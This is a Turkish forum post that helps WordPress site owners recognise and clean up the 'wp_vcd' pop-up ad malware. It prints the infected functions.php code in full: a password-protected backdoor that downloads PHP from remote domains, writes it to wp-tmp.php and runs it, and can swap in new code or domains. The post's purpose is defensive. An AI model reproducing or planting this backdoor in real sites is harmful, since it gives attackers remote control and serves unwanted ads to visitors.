Öncelikle merhaba uzun zamandır yokum ancak bugun bir sorunla karşılaştım araştırdım ancak genel olarak geçici gözümler sunulmuş sorun
Wordpress Pop-up Reklam Virüsü kısaca siz farkında olmadan arkaplanda çalışıyor siz hariç websitenize giriş yapan kişilerin tarayıcıda reklam gibi açılıyor.
Bulaştıgını nasıl anlıyoruz.
function.php ye gelip aşşagıdaki kodarı görüyoruz
Çözüme gelicek olursak hep function.php yukarıdaki kodarı ve iki dosyayı silin yeter yazmışlar ancak yeterli değil her yere yayılmış ve silince muhtemelen .htaccess yüzünden 2 dk sonra tekrar geliyor nedeni kullanılan tema ve eklentiler olabilir tam bilmiyorum.
Ben nasıl çözüm buldum Veritabanı yedeğim vardı resimler kısmını ayırıp tüm Wordpress dosyalarını sildim ardından yenisi ile değiştirip kullandıgım temanın yenisini ekledim ve yine function.php izinlerini sınırlandırdım ilk tarattığım zaman 60 tane Malware görünen web sitesi şimdi tarattıgımda temiz görünüyor.
dediklerimi yaptıkdan sonra muhtemelen sorununuz düzelmş olucak her ihtimale karşı diger şifrelerinizide değiştirin.
Wordpress Pop-up Reklam Virüsü kısaca siz farkında olmadan arkaplanda çalışıyor siz hariç websitenize giriş yapan kişilerin tarayıcıda reklam gibi açılıyor.
Bulaştıgını nasıl anlıyoruz.
function.php ye gelip aşşagıdaki kodarı görüyoruz
Kod:
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '22222218de5c35ff3a0f0ccadc0e1111'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key='e121c363676c86e24b37374a839fbb37';
if (($tmpcontent = @file_get_contents("http://www.trilns.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.trilns.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.trilns.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.trilns.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
Kod:
Aynı zamanda
/wp-includes/ klasörün de wp-tmp.php ve wp-vcd.php isimli iki dosya yer alıyor.Çözüme gelicek olursak hep function.php yukarıdaki kodarı ve iki dosyayı silin yeter yazmışlar ancak yeterli değil her yere yayılmış ve silince muhtemelen .htaccess yüzünden 2 dk sonra tekrar geliyor nedeni kullanılan tema ve eklentiler olabilir tam bilmiyorum.
Ben nasıl çözüm buldum Veritabanı yedeğim vardı resimler kısmını ayırıp tüm Wordpress dosyalarını sildim ardından yenisi ile değiştirip kullandıgım temanın yenisini ekledim ve yine function.php izinlerini sınırlandırdım ilk tarattığım zaman 60 tane Malware görünen web sitesi şimdi tarattıgımda temiz görünüyor.
dediklerimi yaptıkdan sonra muhtemelen sorununuz düzelmş olucak her ihtimale karşı diger şifrelerinizide değiştirin.
